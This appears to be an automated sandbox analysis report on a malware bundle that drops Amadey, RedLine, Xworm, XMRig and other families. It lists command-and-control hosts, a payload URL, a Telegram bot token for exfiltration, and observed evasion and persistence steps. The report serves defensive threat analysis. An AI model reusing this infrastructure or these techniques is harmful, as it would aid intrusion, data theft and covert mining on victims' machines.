amadey | 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

max time kernel
91s
max time network
683s
platform
windows7_x64
resource
win7-20240611-en
resource tags

arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
submitted
23-06-2024 11:15

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

Downloaders.zip
Size

12KB
MD5

94fe78dc42e3403d06477f995770733c
SHA1

ea6ba4a14bab2a976d62ea7ddd4940ec90560586
SHA256

16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
SHA512

add85726e7d2c69068381688fe84defe820f600e6214eff029042e3002e9f4ad52dde3b8bb28f4148cca1b950cd54d3999ce9e8445c4562d1ef2efdb1c6bdeff
SSDEEP

384:6BfwcSEp9ZjKXSBIDv4dDfjlMJ7HWTHWB:efACW6Dr8HWTHWB

Malware Config

Extracted

Family

amadey

Version

4.31

Botnet

c43c2d

http://o7labs.top

Attributes

install_dir
28feeece5c
install_file
Hkbsse.exe
strings_key
db4823e211dffb31faf4fc1fd90d3289
url_paths
/online/support/index.php

rc4.plain

Extracted

Family

redline

Botnet

AMA

185.215.113.67:40960

Extracted

Family

loaderbot

https://cv99160.tw1.ru/cmd.php

Extracted

Family

koiloader

http://195.54.160.202/gowan.php

Attributes

payload_url
https://www.luciaricciardi.com/wp-content/uploads/2018/12

Extracted

Family

xworm

127.0.0.1:7000

beshomandotestbesnd.run.place:7000

Attributes

Install_directory
%ProgramData%
install_file
cmd.exe
telegram
https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672

Extracted

Family

xworm

Version

5.0

64.226.123.178:6098

Mutex

1z0ENxCLSR3XRSre

Attributes

install_file
USB.exe

aes.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect Xehook Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\Files\37.exe	family_xehook
behavioral1/memory/3468-3418-0x0000000000EE0000-0x0000000000F0C000-memory.dmp	family_xehook

Detect Xworm Payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1492-2357-0x0000000000400000-0x0000000000418000-memory.dmp	family_xworm
behavioral1/memory/2692-3488-0x0000000000400000-0x0000000000436000-memory.dmp	family_xworm

Detects Monster Stealer. 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/576-825-0x000000013FCD0000-0x0000000140F05000-memory.dmp	family_monster

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1512-792-0x0000000000400000-0x00000000022E9000-memory.dmp	family_glupteba
behavioral1/memory/1512-835-0x0000000000400000-0x00000000022E9000-memory.dmp	family_glupteba

KoiLoader
KoiLoader is a malware loader written in C++.
loader koiloader
LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
loader miner loaderbot
Monster
Monster is a Golang stealer that was discovered in 2024.
stealer monster

Phorphiex payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\1275827824.exe	family_phorphiex
C:\Users\Admin\AppData\Local\Temp\2983122146.exe	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1724-672-0x0000000001280000-0x00000000012D0000-memory.dmp	family_redline
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TNPG4FQ8\ama[1].exe	family_redline
behavioral1/memory/2472-3102-0x0000000000D40000-0x0000000000D90000-memory.dmp	family_redline

Xehook stealer
Xehook is an infostealer written in C#.
stealer xehook
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Detects KoiLoader payload 1 IoCs

loader

Processes:

resource	yara_rule
behavioral1/memory/532-828-0x0000000000080000-0x000000000008D000-memory.dmp	family_koi_loader

LoaderBot executable 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX1\yondex.exe	loaderbot
behavioral1/memory/2344-785-0x0000000000150000-0x000000000054E000-memory.dmp	loaderbot

Modifies boot configuration data using bcdedit 14 IoCs

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid	process
2468	bcdedit.exe
2080	bcdedit.exe
3900	bcdedit.exe
2136	bcdedit.exe
3628	bcdedit.exe
1884	bcdedit.exe
1532	bcdedit.exe
992	bcdedit.exe
1520	bcdedit.exe
2720	bcdedit.exe
2312	bcdedit.exe
3956	bcdedit.exe
3412	bcdedit.exe
2716	bcdedit.exe

Nirsoft 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\Files\AdvancedRun.exe	Nirsoft

XMRig Miner payload 22 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/484-577-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/484-579-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/484-583-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/484-582-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/484-581-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/484-580-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/484-576-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/484-646-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2804-649-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2804-652-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2804-651-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2804-650-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2804-648-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2804-655-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2804-656-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2368-802-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1944-817-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1564-832-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2688-838-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2664-842-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2564-859-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1364-877-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exePowershell.exepowershell.exe

pid	process
3120	powershell.exe
4032	powershell.exe
788	powershell.exe
3348	powershell.exe
3556	powershell.exe
3620	powershell.exe
1748	powershell.exe
1496	powershell.exe
916	powershell.exe
3476	powershell.exe
3716	powershell.exe
1952	powershell.exe
2148	powershell.exe
2488	powershell.exe
4124	powershell.exe
2052	powershell.exe
1960	Powershell.exe
3264	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

3312 netsh.exe
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command and Scripting Interpreter
T1059
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

pid	process
3312	netsh.exe

Executes dropped EXE 16 IoCs

Processes:

New Text Document mod.exe4363463463464363463463463.exeuYtF.exeserieta.exenatura.exenautr.exe0x3fg.exeNotepad.exeNotepad.exeHkbsse.exesetup.exesetup.exeuYtF.exewfbrmcwrltkl.exeBuildTotale.exe

pid	process
1684	New Text Document mod.exe
1308	4363463463464363463463463.exe
2248	uYtF.exe
2384	serieta.exe
2644	natura.exe
1412	nautr.exe
3060	0x3fg.exe
1416	Notepad.exe
2724	Notepad.exe
832	Hkbsse.exe
2020	setup.exe
2356	setup.exe
2180	uYtF.exe
476
340	wfbrmcwrltkl.exe
2428	BuildTotale.exe

Loads dropped DLL 20 IoCs

Processes:

New Text Document mod.exeserieta.exeNotepad.exeNotepad.exe0x3fg.exesetup.exeHkbsse.exe

pid	process
1684	New Text Document mod.exe
1684	New Text Document mod.exe
1140
2384	serieta.exe
2384	serieta.exe
2384	serieta.exe
2384	serieta.exe
2384	serieta.exe
1416	Notepad.exe
2724	Notepad.exe
3060	0x3fg.exe
1684	New Text Document mod.exe
1140
1140
1140
2020	setup.exe
1140
832	Hkbsse.exe
832	Hkbsse.exe
476

Themida packer 4 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\RageMP131\RageMP131.exe	themida
C:\Users\Admin\AppData\Local\Temp\da_protected.exe	themida
behavioral1/memory/4032-3262-0x0000000001060000-0x00000000019B8000-memory.dmp	themida
behavioral1/memory/4032-3261-0x0000000001060000-0x00000000019B8000-memory.dmp	themida

UPX packed file 21 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/484-572-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/484-577-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/484-579-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/484-583-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/484-582-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/484-581-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/484-580-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/484-576-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/484-575-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/484-574-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/484-573-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/484-571-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/484-646-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2804-649-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2804-652-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2804-651-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2804-650-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2804-648-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2804-655-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2804-656-0x0000000140000000-0x0000000140848000-memory.dmp	upx
C:\Users\Admin\Desktop\Files\nircmd.exe	upx

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Hkbsse.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Windows\CurrentVersion\Run\uYtF.exe = "C:\\Users\\Admin\\AppData\\Roaming\\1000001000\\uYtF.exe"	Hkbsse.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs

Web Service

T1102

Processes:

flow	ioc
113	raw.githubusercontent.com
219	pastebin.com
220	pastebin.com
1053	raw.githubusercontent.com
1054	raw.githubusercontent.com
114	raw.githubusercontent.com
447	raw.githubusercontent.com
864	bitbucket.org
865	bitbucket.org

Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

719 ipinfo.io
720 ipinfo.io
927 ip-api.com
365 ipinfo.io
368 ipinfo.io

flow	ioc
719	ipinfo.io
720	ipinfo.io
927	ip-api.com
365	ipinfo.io
368	ipinfo.io

Power Settings 1 TTPs 16 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

T1653

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

pid	process
2064	powercfg.exe
1396	powercfg.exe
2924	powercfg.exe
1404	powercfg.exe
1828	powercfg.exe
2224	powercfg.exe
764	powercfg.exe
2876	powercfg.exe
1556	powercfg.exe
628	powercfg.exe
1176	powercfg.exe
1548	powercfg.exe
2888	powercfg.exe
1652	powercfg.exe
3608	powercfg.exe
2548	powercfg.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

wfbrmcwrltkl.exe

description pid process target process

PID 340 set thread context of 484 340 wfbrmcwrltkl.exe explorer.exe
Drops file in Windows directory 1 IoCs

Processes:

0x3fg.exe

description ioc process

File created C:\Windows\Tasks\Hkbsse.job 0x3fg.exe

description	pid	process	target process
PID 340 set thread context of 484	340	wfbrmcwrltkl.exe	explorer.exe

description	ioc	process
File created	C:\Windows\Tasks\Hkbsse.job	0x3fg.exe

Launches sc.exe 34 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
2088	sc.exe
668	sc.exe
2232	sc.exe
3100	sc.exe
3460	sc.exe
1616	sc.exe
1096	sc.exe
580	sc.exe
532	sc.exe
1456	sc.exe
1432	sc.exe
2740	sc.exe
2536	sc.exe
2684	sc.exe
3556	sc.exe
3924	sc.exe
684	sc.exe
1664	sc.exe
1408	sc.exe
1008	sc.exe
2460	sc.exe
3836	sc.exe
2512	sc.exe
2620	sc.exe
2900	sc.exe
2384	sc.exe
3904	sc.exe
3380	sc.exe
1964	sc.exe
2540	sc.exe
3572	sc.exe
3960	sc.exe
1008	sc.exe
3216	sc.exe

Detects Pyinstaller 1 IoCs

pyinstaller

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\Notepad.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 5 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1408	2368	WerFault.exe	gold.exe
4708	4592	WerFault.exe	legs.exe
3988	5976	WerFault.exe	lumma123.exe
5424	3224	WerFault.exe	file.exe
4956	2296	WerFault.exe	nine.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

3664 timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

3328 tasklist.exe
3864 tasklist.exe

pid	process
3664	timeout.exe

pid	process
3328	tasklist.exe
3864	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies Control Panel 2 IoCs

evasion

Processes:

rundll32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Control Panel\Appearance\Schemes	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Control Panel\Appearance\CustomColors = ffffff00ffffff00ffffff00ffffff00ffffff00ffffff00ffffff00ffffff00ffffff00ffffff00ffffff00ffffff00ffffff00ffffff00ffffff00ffffff00	rundll32.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

New Text Document mod.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	New Text Document mod.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	New Text Document mod.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	New Text Document mod.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	New Text Document mod.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
1620	schtasks.exe
3740	schtasks.exe
764	schtasks.exe
4000	schtasks.exe
2416	schtasks.exe
2912	schtasks.exe
1456	schtasks.exe
1356	schtasks.exe
3824	schtasks.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

Processes:

chrome.exeuYtF.exewfbrmcwrltkl.exenatura.exe

pid	process
1912	chrome.exe
1912	chrome.exe
2248	uYtF.exe
2248	uYtF.exe
2248	uYtF.exe
2248	uYtF.exe
2248	uYtF.exe
2248	uYtF.exe
2248	uYtF.exe
2248	uYtF.exe
340	wfbrmcwrltkl.exe
340	wfbrmcwrltkl.exe
340	wfbrmcwrltkl.exe
340	wfbrmcwrltkl.exe
340	wfbrmcwrltkl.exe
2644	natura.exe

Suspicious use of AdjustPrivilegeToken 33 IoCs

Processes:

chrome.exe7zG.exe7zG.exe7zG.exeNew Text Document mod.exe4363463463464363463463463.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exeexplorer.exe

description	pid	process
Token: SeShutdownPrivilege	1912	chrome.exe
Token: SeShutdownPrivilege	1912	chrome.exe
Token: SeShutdownPrivilege	1912	chrome.exe
Token: SeShutdownPrivilege	1912	chrome.exe
Token: SeShutdownPrivilege	1912	chrome.exe
Token: SeShutdownPrivilege	1912	chrome.exe
Token: SeShutdownPrivilege	1912	chrome.exe
Token: SeShutdownPrivilege	1912	chrome.exe
Token: SeShutdownPrivilege	1912	chrome.exe
Token: SeShutdownPrivilege	1912	chrome.exe
Token: SeRestorePrivilege	2408	7zG.exe
Token: 35	2408	7zG.exe
Token: SeSecurityPrivilege	2408	7zG.exe
Token: SeSecurityPrivilege	2408	7zG.exe
Token: SeRestorePrivilege	2604	7zG.exe
Token: 35	2604	7zG.exe
Token: SeSecurityPrivilege	2604	7zG.exe
Token: SeSecurityPrivilege	2604	7zG.exe
Token: SeRestorePrivilege	264	7zG.exe
Token: 35	264	7zG.exe
Token: SeSecurityPrivilege	264	7zG.exe
Token: SeSecurityPrivilege	264	7zG.exe
Token: SeDebugPrivilege	1684	New Text Document mod.exe
Token: SeDebugPrivilege	1308	4363463463464363463463463.exe
Token: SeShutdownPrivilege	1652	powercfg.exe
Token: SeShutdownPrivilege	1828	powercfg.exe
Token: SeShutdownPrivilege	1176	powercfg.exe
Token: SeShutdownPrivilege	2064	powercfg.exe
Token: SeShutdownPrivilege	764	powercfg.exe
Token: SeShutdownPrivilege	1548	powercfg.exe
Token: SeShutdownPrivilege	1396	powercfg.exe
Token: SeShutdownPrivilege	2224	powercfg.exe
Token: SeLockMemoryPrivilege	484	explorer.exe

Suspicious use of FindShellTrayWindow 39 IoCs

Processes:

chrome.exe7zG.exe7zG.exe7zG.exe0x3fg.exe

pid	process
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
2408	7zG.exe
2604	7zG.exe
264	7zG.exe
3060	0x3fg.exe

Suspicious use of SendNotifyMessage 32 IoCs

Processes:

chrome.exe

pid	process
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe
1912	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 1912 wrote to memory of 1900	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1900	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1900	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
PID 1912 wrote to memory of 1356	1912	chrome.exe	chrome.exe
